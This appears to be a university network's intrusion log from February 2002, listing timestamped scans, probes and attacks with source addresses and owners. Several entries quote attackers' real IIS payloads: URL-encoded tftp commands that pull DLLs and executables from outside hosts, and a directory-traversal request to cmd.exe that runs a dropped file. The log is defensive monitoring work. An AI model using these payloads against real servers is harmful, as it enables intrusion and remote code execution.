(Keebler Company,IL,US) 1. Attack various IIS server with command: 2002/02/18-06:08:44.31 198.62.212.109 (Keebler Company,IL,US) 2. tftp%20-i%20132.252.30.155%20GET%20cool.dll%20c:\httpodbc.dll 2002/02/18-06:10:22.89 216.39.149.244 (proxy.mav.com) scannet for port 22 2002/02/18-08:39:28.34 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080, 3128, 80, 1080, 23 2002/02/18-08:52:35.75 211.219.8.68 (korea crap) scannet for port 1433 2002/02/18-09:06:36.76 64.45.60.71 (NETlimited ,CA,US) conn to several ips ports 1024, 3072 til 2002/02/19-04:44:46.22 2002/02/18-13:26:20.32 64.114.106.22 (dcwap106.22.pris.bc.ca) ping scannet 2002/02/18-13:28:28.81 66.75.117.126 (sc-66-75-117-126.socal.rr.com) conn to 132.235.4.26:6346 repeately til 20:03:10.61 2002/02/18-15:18:14.50 212.179.242.111 (bzq-242-111.bezeqint.net) scannetfor port 80 2002/02/18-15:44:11.26 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC,CA,US) scan 132.235.4.19 ports 1080,80,3128,81,8081,23 2002/02/18-15:44:29.46 66.169.43.139 (sc-grnvl-66-169-43-139.chartersc.net) scan 132.235.4.19 ports 1080, 23 2002/02/18-16:53:56.33 212.179.242.111:137 (bzq-242-111.bezeqint.net) netbios name scan of serveral ips 2002/02/18-22:03:10.29 61.177.251.43 (CHINANET Jiangsu province network-CN) connt o 132.235.1.35:21 2002/02/18-23:06:20.97 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red attack - GET /scripts/root.exe 2002/02/19-03:31:19.95 66.60.157.246 (246.dsl6660157.rstatic.surewest.net) scan 132.235.1.2 ports 1080,80,81,3128,8000,8080,8081 2002/02/19-05:09:21.00 4.61.33.207 (lsanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net) scannet for port 80 2002/02/19-07:13:06.26 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 prts 8080, 3128, 80, 1080, 23 2002/02/19-07:48:04.56 213.194.153.210 (IBERCOM SL?, SP) portscan 132.235.1.1 on portgs 13[5-9],140 2002/02/19-10:04:26.37 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red/nimba/whatever attacks start 2002/02/19-10:23:34.61 217.128.155.121 (ALe-Mans-301-1-2-121.abo.wanadoo.fr) scannet for port 21 2002/02/19-12:11:27.84 195.23.10.113 (195-23-10-113.nr.ip.pt) scannet for port 111+buff overflow attacks 2002/02/19-15:17:21.32 146.20.33.71 (proxy1.monitor.dal.net-Chodey & Co.,NJ,US) probe 132.235.4.219 port 1080,80,3128,8080,81,8081,23 2002/02/19-16:43:55.88 217.125.163.33 (217-125-163-33.uc.nombres.ttd.es) 1. use anon ftp to get dummy passwd file. Crack it on his pc 2002/02/19-16:43:55.88 217.125.163.33 (217-125-163-33.uc.nombres.ttd.es) 2. Use cracked passwdds (some wrong) to try to log in. 2002/02/19-16:46:08.69 172.172.81.13 (ACAC510D.ipt.aol.com) conn to 132.235.3.246:6346 repeately til 2002/02/19-17:41:20.93 2002/02/19-19:35:22.99 203.106.187.191 (TMnet Telekom Malaysia,MY) scannet for port 111 2002/02/19-19:56:33.43 217.129.92.207 (Cabovisao, televisao por cabo, SA,PT) scannet for port 21 2002/02/19-20:08:01.68 61.175.153.129 (CHINANET Zhejiang province network,CN) 1. scan 4 ips on port 111. attack 1 ip w/buff overflow 2002/02/19-20:08:01.68 61.175.153.129 (CHINANET Zhejiang province network,CN) 2. attack to start server on listen port (2766) 2002/02/19-20:10:52.31 203.106.187.191 (TMnet Telekom Malaysia,MY) connect on port 2766 to machine attacked by 61.175.153.129 2002/02/19-21:05:27.43 172.148.38.107 (AC94266B.ipt.aol.com) conn to 132.235.3.246:6346 repeately til 2002/02/19-22:11:28.28 2002/02/20-00:30:05.52 24.208.181.225 (dhcp024-208-181-225.columbus.rr.com) portscan 132.235.17.1 2002/02/20-01:57:19.50 64.38.245.228 (nttrainer.cavecreek.net) portscan 132.235.18.168 on 80.81,1080,3128,8000,8001,8010,8080,8081.8888 2002/02/20-05:58:12.78 213.252.151.40 (BCC GmbH,dE) scan 132.235.3.133 119, 22 2002/02/20-06:26:19.87 213.252.151.29 (BCC GmbH,dE) scan 132.235.3.133 21, 119, 80 2002/02/20-06:53:46.46 213.252.151.33 (BCC GmbH,dE) scan 132.235.3.133 p[ot 22 2002/02/20-07:18:54.04 216.78.167.250 (adsl-78-167-250.gsp.bellsouth.net) scan 132.235.3.51 ports 27374 12345 139 2002/02/20-07:27:16.16 213.252.151.41 (BCC GmbH,dE) scan 132.235.3.133 port 143, 6000 2002/02/20-08:18:34.86 213.252.151.5 (BCC GmbH,dE) scan 132.235.3.133 ports 21, 8000 2002/02/20-08:48:15.47 213.252.151.24 (BCC GmbH,dE) scan 132.235.3.133 110 2002/02/20-08:57:44.07 64.9.35.139 (E Sambol Corporation,NJ,US - via adelphia) can serveral ips for port 21 2002/02/20-08:57:50.84 65.101.224.250 (Rablin Express,CO,US-via US WEST...) scan serveral ips for port 21 2002/02/20-08:57:55.48 64.65.251.111 (host-64-65-251-111.choiceone.net) scan serveral ips for port 21 2002/02/20-08:57:56.77 64.8.211.76 (Network Access Solutions,HERNDON,VA,US) scan serveral ips for port 21 2002/02/20-08:58:00.91 210.23.111.130 (Philippines..) scan serveral ips for port 21 2002/02/20-08:58:09.94 65.101.146.217 (U S WEST Communications Svcs, Inc.,MN,US) scan serveral ips for port 21 2002/02/20-08:58:11.46 200.201.128.140 (200.201.128.140.clientes.spo.ifxnetworks.com.br) scan serveral ips for port 21 2002/02/20-08:58:11.99 63.64.43.121 (Las Colinas Microsoft,TX,US) scan serveral ips for port 21 2002/02/20-08:58:12.02 64.2.255.77 (w077.z064002255.chi-il.dsl.cnc.net) scan serveral ips for port 21 2002/02/20-08:58:13.83 210.23.255.167 (Philippines..) scan serveral ips for port 21 2002/02/20-08:58:16.44 64.65.206.154 (host-64-65-206-154.choiceone.net) scan serveral ips for port 21 2002/02/20-08:58:17.38 210.23.202.221 (Philippines..) scan serveral ips for port 21 2002/02/20-08:58:23.57 64.8.5.197 (I.D. One,NY,US-via Adelphia) scan serveral ips for port 21 2002/02/20-08:58:25.46 64.66.38.34 (Startec Global Communications,MD,US) scan serveral ips for port 21 2002/02/20-08:58:28.03 64.9.48.41 (Adelphia Business Solutions,PA,US) scan serveral ips for port 21 2002/02/20-08:58:36.38 64.3.176.219 (w219.z064003176.stl-mo.dsl.cnc.net) scan serveral ips for port 21 2002/02/20-09:01:54.85 200.201.128.140 (200.201.128.140.clientes.spo.ifxnetworks.com.br) scannet for port 21, 137 2002/02/20-09:07:49.22 65.101.130.177 (U S WEST Communications Svcs, Inc.,MN,US) scan serveral ips for port 21 2002/02/20-11:04:13.19 65.32.129.136 (6532129hfc136.tampabay.rr.com) scan 132.235.18.87 ports 10009,60000,10008 2002/02/20-11:11:22.26 213.252.151.38 (BCC GmbH,dE) scan 132.235.3.133 21 2002/02/20-11:46:27.66 217.84.255.95 (pD954FF5F.dip.t-dialin.net) scannet for port 80 2002/02/20-12:21:19.46 165.194.216.124 (Chungang University,SEOUL,KR) scannet for port 21 2002/02/20-12:21:19.57 165.194.216.124:21 (Chungang University ,SEOUL,KR) scan net for port 21 2002/02/20-13:15:16.04 195.241.74.82 (WORLDONLINE,NL) scannet for port 80 2002/02/20-13:45:36.28 65.32.129.136 (6532129hfc136.tampabay.rr.com) scan 132.235.18.53 ports 10009,60000,10008 2002/02/20-14:18:33.32 64.8.5.194 (I.D. One,NY,US-via Adelphia) scan serveral ips for port 21 2002/02/20-14:18:36.70 210.23.111.130 (Philippines..) scan serveral ips for port 21 2002/02/20-14:19:40.85 213.252.151.5 (BCC GmbH,dE) scan 132.235.3.133 ports 8080 2002/02/20-14:19:40.85 216.189.164.97 (chtrmb-164-97.the-beach.net) scan 132.235.3.133 port 8080 2002/02/20-14:29:55.56 213.252.151.39 (BCC GmbH,dE) scan 132.235.3.133 21, 139 2002/02/20-14:50:10.76 65.101.130.177 (U S WEST Communications Svcs, Inc.,MN,US) scan serveral ips for port 21 2002/02/20-14:50:11.04 65.101.146.217 (U S WEST Communications Svcs, Inc.,MN,US) scan serveral ips for port 21 2002/02/20-14:50:19.72 64.9.48.41 (Adelphia Business Solutions,PA,US) scan serveral ips for port 21 2002/02/20-14:50:19.97 64.65.206.154 (host-64-65-206-154.choiceone.net) scan serveral ips for port 21 2002/02/20-14:50:25.86 64.2.255.77 (w077.z064002255.chi-il.dsl.cnc.net) scan serveral ips for port 21 2002/02/20-14:50:27.89 65.101.224.250 (Rablin Express,CO,US-via US WEST...) scan serveral ips for port 21 2002/02/20-14:50:41.56 200.201.128.140 (200.201.128.140.clientes.spo.ifxnetworks.com.br) scan serveral ips for port 21 2002/02/20-14:50:54.04 64.8.211.76 (Network Access Solutions,HERNDON,VA,US) scan serveral ips for port 21 2002/02/20-14:51:41.25 63.64.43.121 (Las Colinas Microsoft,TX,US) scan serveral ips for port 21 2002/02/20-14:51:41.44 64.3.176.219 (w219.z064003176.stl-mo.dsl.cnc.net) scan serveral ips for port 21 2002/02/20-14:51:53.99 64.66.38.34 (Startec Global Communications,MD,US) scan serveral ips for port 21 2002/02/20-15:22:23.24 172.165.191.78 (ACA5BF4E.ipt.aol.com) scan 132.235.3.246:6346 continuous til 23:08:19.61 2002/02/20-15:50:58.71 213.252.151.30 (BCC GmbH,dE) scan 132.235.3.133 21 2002/02/20-16:12:08.57 147.208.171.139 (security.norton.com) portscan 132.235.16.57 2002/02/20-16:45:41.70 132.177.204.27 (nhptv-27.unh.edu) 1. attack IIS servers on campus with command: 2002/02/20-16:45:41.70 132.177.204.27 (nhptv-27.unh.edu) 2. tftp%20-i%20132.177.204.27%20GET%20Admin.dll%20c:\Admin.dll 2002/02/20-17:31:04.78 208.180.59.121 (cdm-208-59-121-alex.cox-internet.com) scannet for port 27374 2002/02/20-17:31:12.65 208.180.59.121 (cdm-208-59-121-alex.cox-internet.com) scannet for port 27374 2002/02/20-18:03:58.59 213.252.151.46 (BCC GmbH,dE) scan 132.235.3.133 port 110, 113 2002/02/20-18:04:04.34 213.252.151.47 (BCC GmbH,dE) scan 132.235.3.133 port 111 2002/02/20-18:40:47.17 195.6.82.66 (linksecours.usinor.com) scan 132.235.1.252 ports 25,37852 3 times 2002/02/20-18:40:47.34 195.146.209.253 (Nord - FRANCE,FR) scan 132.235.1.252 ports 25,37852 2002/02/20-18:40:53.00 213.252.151.16 (BCC GmbH,dE) scan 132.235.3.133 113 2002/02/20-18:40:53.00 213.252.151.28 (BCC GmbH,dE) scan 132.235.3.133 80, 3306 2002/02/20-18:42:34.47 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red/nimba/whatever attacks start 2002/02/20-19:13:01.84 131.156.43.131 (orient14.admin.niu.edu) scan 132.235.3.133 port 111 2002/02/20-19:28:38.76 210.23.111.130 (Philippines..) scan serveral ips for port 21 2002/02/20-19:55:12.95 213.252.151.6 (BCC GmbH,dE) scan 132.235.3.133 119 2002/02/20-20:19:16.11 61.177.61.242 (Suzhou kaimei electric co ltd,CN) 1. attack IIS servers on campus with command: 2002/02/20-20:19:16.11 61.177.61.242 (Suzhou kaimei electric co ltd,CN) 2. tftp%20-i%20132.232.9.225%20GET%20Admin.dll%20c:\Admin.dll 2002/02/21-00:58:00.22 132.177.70.172 (student3a-472.unh.edu) tftp%20-i%20132.177.70.172%20GET%20Admin.dll%20d:\Admin.dll 2002/02/21-00:58:00.22 132.177.70.172 (student3a-472.unh.edu) 1. attack IIS servers on campus with command: 2002/02/21-04:00:59.98 202.149.81.146 (PT. Satata Neka Tama,ID) scan 132.235.1.252 ports 25,37852 2002/02/21-07:50:36.04 213.237.71.207 (213.237.71.207.adsl.vg.worldonline.dk) scannet for port 80 2002/02/21-11:25:00.77 63.169.40.130 (lebshells.acool.net) scan 132.235.2.114 for ports 1080.80.3128,81,8081,23 2002/02/21-12:03:17.55 217.88.139.125 (pD9588B7D.dip.t-dialin.net) scannet for port 21 2002/02/21-12:47:37.34 80.11.92.83 (ANancy-103-1-2-83.abo.wanadoo.fr) scannet for port 21 2002/02/21-13:00:32.60 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC ,CA,US) scan 132.235.4.220 for port 1080,23,80,3128,81,8080,8081 2002/02/21-13:02:52.34 66.169.44.131 (sc-grnvl-66-169-44-131.chartersc.net) scan 132.235.4.220 for port 1080,23 3 times 2002/02/21-15:56:35.07 172.155.8.51 (AC9B0833.ipt.aol.com) continusouly conn to 132.235.3.246:6346 til 16:18:33.81 2002/02/21-20:32:24.07 129.1.200.138 (tpitten.res.bgsu.edu) scannet with ping 2002/02/21-20:34:46.76 129.1.200.138 (tpitten.res.bgsu.edu) scannet for port 1214 2002/02/21-20:55:15.71 172.143.219.53 (AC8FDB35.ipt.aol.com) continusouly conn to 132.235.3.246:6346 til 21:15:25.18 2002/02/21-23:19:30.59 65.94.184.159 (Bell Nexxia,QUEBEC,CA) scannet for port 80 2002/02/22-00:02:52.26 24.199.87.149 (user-0ccelsl.cable.mindspring.com) scannet for port 80 2002/02/22-00:23:19.63 172.164.115.171 (ACA473AB.ipt.aol.com) continusouly conn to 132.235.3.246:6346 til 2002/02/22-00:38:29.09 2002/02/22-01:18:38.43 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/22-18:35:35.24 2002/02/22-01:32:15.87 65.94.184.159 (Bell Nexxia,QUEBEC,CA) do heavy DIR cmd scan via IIS buff overflow on iis server. 2002/02/22-01:37:35.34 66.110.147.170 (adsl-66.110.147-170.globetrotter.net) 1. attack IIS server with buff overflow cmd: 2002/02/22-01:37:35.34 66.110.147.170 (adsl-66.110.147-170.globetrotter.net) 2. tftp+-i+66.110.147.170+get+iss.exe+c:\winnt\tasks\iss.exe 2002/02/22-03:30:33.78 80.128.233.44 (p5080E92C.dip.t-dialin.net) scannet for ports 80,1433 2002/02/22-10:37:38.40 195.96.158.98 (Archway S.r.l,Milano,IT) scannet for port 515 2002/02/22-15:20:33.01 165.229.22.33 (arch.yeungnam.ac.kr) scannet for port 22 2002/02/22-16:23:22.45 217.128.197.134 (AAmiens-104-1-1-134.abo.wanadoo.fr) scan several ips for port 21 2002/02/22-21:46:57.38 205.207.148.253 (sunset.aci.on.ca) scannet for port 80 2002/02/22-22:05:27.48 62.212.115.245 (telehouse-102-1-26-245.adsl.nerim.net) scannet for port 80 2002/02/23-05:49:20.40 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/24-05:58:07.91 2002/02/23-07:08:02.58 193.170.188.243 (aurora.uni-ak.ac.at) scannet for port 80 2002/02/23-08:19:08.57 211.237.89.250 (Korea crap) scannt for port 22 2002/02/23-18:07:21.45 35.8.90.128 (Michigan State University,MI,US) scannet for port 139,137 2002/02/24-00:43:49.22 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) ping scan net 2002/02/24-00:44:06.79 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) portscan several ips for 21,25,80,110,119,6588 2002/02/24-00:44:07.32 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) scannet for port 23 2002/02/24-02:10:46.99 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) portscan net for 21,25,80,110,119,6588 .x.du.log.19428/cge2cgf_contents.dat:GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+c:\sbpci\iss.exe HTTP/1.1 2002/02/24-05:58:17.05 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/25-05:59:19.92 2002/02/24-07:13:27.06 200.60.108.56 (TAI LOY S.A,LIMA,PE) scannet for port 111 2002/02/24-12:28:25.45 63.170.254.181 (maya3.mayaco.com) scannet for port 1433 2002/02/24-19:29:16.93 129.21.133.179 (res133b-179.rh.rit.edu) scannet for port 22 2002/02/25-04:06:38.02 212.186.231.163 (cha212186231163.chello.fr) scannet for port 21 2002/02/25-05:59:57.49 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/25-22:35:24.86 2002/02/25-08:10:18.16 66.140.25.157 (ROBERT LEVIN,TX,US) portcan 132.235.3.137 ports 8080,3128,80,1080,23 2002/02/25-09:04:01.94 128.230.89.51 (source.syr.edu) scannet for port 23,22 2002/02/25-09:04:14.13 128.230.89.51 (source.syr.edu) scannet for port 22 2002/02/25-09:29:49.80 218.5.3.244 (CHINANET fujian province network,CN) portscan 132.235.201.31 ports 139,445,137 2002/02/25-12:08:14.41 66.75.117.126 (sc-66-75-117-126.socal.rr.com) probe 132.235.4.26:6346 2002/02/25-12:35:35.82 204.192.99.126 (dyn126-nas03.athens.frognet.net) scan 132.235.1[1,2] for port 389 2002/02/25-14:08:52.51 216.205.78.109 (109-216.205.78.dellhost.com) scannet for port 22 2002/02/25-14:37:57.16 4.61.33.207 (sanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net)probe port 21 on various ips 2002/02/25-15:14:59.13 217.128.250.60 (AMarseille-201-1-5-60.abo.wanadoo.fr) scannet for port 21 2002/02/25-17:12:51.81 203.186.182.148 (203186182148.ctinets.com) scannet for port 21 2002/02/25-17:15:51.46 137.205.227.118 (University of Warwick,COVENTYR,GB) scannet for port 21 2002/02/25-20:29:46.07 129.8.41.73 (California State University at Fresno,CA,US) scan net for port 80 2002/02/25-21:33:35.56 24.71.184.243 (h24-71-184-243.ss.shawcable.net) probe 132.235.4.64:6346 2002/02/25-21:46:13.46 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) 1. attack IIS server with command: 2002/02/25-21:46:13.46 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) 2. c+tftp+-i+65.94.188.134+get+serv-u.ini+c:\inetpub\scripts\serv-u.ini 2002/02/25-21:55:23.80 132.235.163.117 (dhcp-163-117.east-green.ohiou.edu) scannet for port 21 2002/02/25-22:13:02.15 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) attack IIS server with command /c+c:\sbpci\iss.exe 2002/02/25-22:23:23.70 172.150.73.160 (AC9649A0.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/25-22:31:39.46 2002/02/25-22:45:29.09 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) conn to target iis machine on port 8888 2002/02/26-01:17:09.22 128.95.237.48 (University of Washington,WA,US) ping scan of net 2002/02/26-01:17:12.70 128.95.237.48 (University of Washington,wa,us) scannet for port 135,139 2002/02/26-06:53:11.32 217.224.5.22 (pD9E00516.dip.t-dialin.net) scannet for port 80 2002/02/26-07:23:07.06 137.165.10.166 (bquinn-newdell.williams.edu) pound on 132.235.201.42:6346 til 2002/02/26-14:47:21.82 2002/02/26-07:44:32.09 66.140.25.157 (ROBERT LEVIN,TX,US) portcan 132.235.3.137 ports 8080,3128,80,1080,23 2002/02/26-11:13:43.78 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/02/26-11:20:52.82 132.235.162.168 (dhcp-162-168.east-green.ohiou.edu) scan serverl ips on port 3343[123] 2002/02/26-12:10:05.83 213.14.25.208 (VESTELNET,TR) scannet for port 27374 2002/02/26-13:05:47.31 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for oprt 524 2002/02/26-13:25:04.92 66.75.117.126 (sc-66-75-117-126.socal.rr.com) pound on 132.235.4.26:6346 til 2002/02/27-05:48:07.36 2002/02/26-13:26:32.56 80.13.154.98 (ALyon-202-1-5-98.abo.wanadoo.fr) scannet for port 80 2002/02/26-15:09:21.35 65.94.145.77 (MTL-HSE-ppp180725.qc.sympatico.ca) try to get to hacker ftp server instadedd by 65.94.188.134 2002/02/26-16:17:48.33 211.21.159.90 (CHTD, Chunghwa Telecom Co.,Ltd,TW) scnnet for port 21 2002/02/26-16:17:48.43 211.21.159.90 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21 2002/02/26-16:26:57.02 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 (ingrislock - HMmmmmm) 2002/02/26-16:50:25.96 217.136.73.225 (adsl-51681.turboline.skynet.be) scannet for port 21 2002/02/26-16:50:32.26 217.136.73.225 (adsl-51681.turboline.skynet.be) scannet for port 21 2002/02/26-16:58:36.40 80.128.17.18 (p50801112.dip.t-dialin.net) bang on 132.235.201.211:6346 til 2002/02/26-17:32:08.62 2002/02/26-17:57:44.82 172.143.34.173 (AC8F22AD.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/26-19:36:40.84 2002/02/26-22:04:26.04 172.159.121.243 (AC9F79F3.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/26-23:49:51.20 2002/02/26-22:46:30.00 216.190.255.220 (Wasatch Hosting,UT,US) scannet for port 25 2002/02/26-23:50:29.52 217.128.164.63 (ANancy-101-1-5-63.abo.wanadoo.fr) scan serveral ips for port 445 2002/02/27-03:30:40.29 63.250.72.14 (ppp-14.danville.net) scan 132.235.201.[40,126] ports 585 548 5500 8080 25867 21 2002/02/27-05:45:54.42 62.158.141.151 (p3E9E8D97.dip.t-dialin.net) probe 132.235.3.106 pots 139, 12345, 27374 2002/02/27-05:48:42.80 66.71.42.8 (KAM391.rh.psu.edu) bang on 132.235.4.26:6346 til 2002/02/28-05:52:16.86 2002/02/27-07:50:06.00 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23 2002/02/27-07:56:28.50 211.172.226.26 (korea crap) scannet for port 1524 2002/02/27-07:56:29.16 211.172.226.26 (korea crap) scnnet for port 1524 2002/02/27-09:28:11.33 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23 2002/02/27-10:12:38.30 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23 2002/02/27-13:29:05.09 217.136.73.225 (adsl-51681.turboline.skynet.be) probe port 21 on networked printer 2002/02/27-14:31:20.84 217.136.73.225 (adsl-51681.turboline.skynet.be) probe port 21 on networked printer 2002/02/27-15:30:48.29 200.221.91.38 (200-221-91-38.dsl-sp.uol.com.br) scannet for port 22 2002/02/27-15:33:40.48 63.199.26.228 (adsl-63-199-26-228.dsl.snfc21.pacbell.net) scannet for port 123 2002/02/27-15:55:00.54 63.199.26.228 (adsl-63-199-26-228.dsl.snfc21.pacbell.net) scannet for port 22 2002/02/27-17:02:47.51 202.107.53.125 (CHINANET liaoning province network,CN) scannet for port 515 2002/02/28-02:13:51.59 132.235.197.131 (hardnoc3.cns.ohiou.edu) scannet for port 161 2002/02/28-05:53:38.73 66.75.117.126 (sc-66-75-117-126.socal.rr.com) pound on 132.235.4.26:6346 til 2002/03/01-01:00:08.22 2002/02/28-10:24:51.06 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) bang on 132.235.3.216:6346 til 2002/03/01-05:43:10.89 2002/02/28-10:51:21.52 62.4.67.208 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-11:06:53.98 192.44.243.18 (c2.sll.se) scnnet for port 21 2002/02/28-11:26:24.27 62.4.67.86 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-11:51:27.50 62.4.67.146 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-12:11:17.62 217.128.85.107 (ALyon-202-1-2-107.abo.wanadoo.fr) IIS attack: tftp+-i+217.128.85.107+get+servudaemon.exe+c:\Inetpub\scripts\servudaemon.exe 2002/02/28-16:05:13.32 207.239.248.92 (FrogNet, Inc.,OH,US) scannet for port 139 2002/02/28-16:05:26.69 207.239.248.92 (FrogNet, Inc.,OH,US) portscan multiple ips for ports 445,139,137,80 2002/02/28-16:24:06.75 62.4.67.142 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-16:35:52.00 172.137.7.118 (AC890776.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/28-21:22:09.39 2002/02/28-17:10:31.33 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.1.171 for ports 8080, 1080 80 3128 23 2002/02/28-20:26:35.24 216.3.1.11 (dyn010-ts8a.athens.frognet.net) scannet ofr port 1214 2002/02/28-20:55:56.22 66.32.156.9 (user-1121709.dsl.mindspring.com) scannet for port 161 2002/02/28-21:44:29.48 172.173.253.179 (ACADFDB3.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/28-22:07:58.63 2002/02/28-22:44:45.61 66.186.68.152 (Chelmsford-cable-66-186-68-152.vianet.ca) scannet for port 80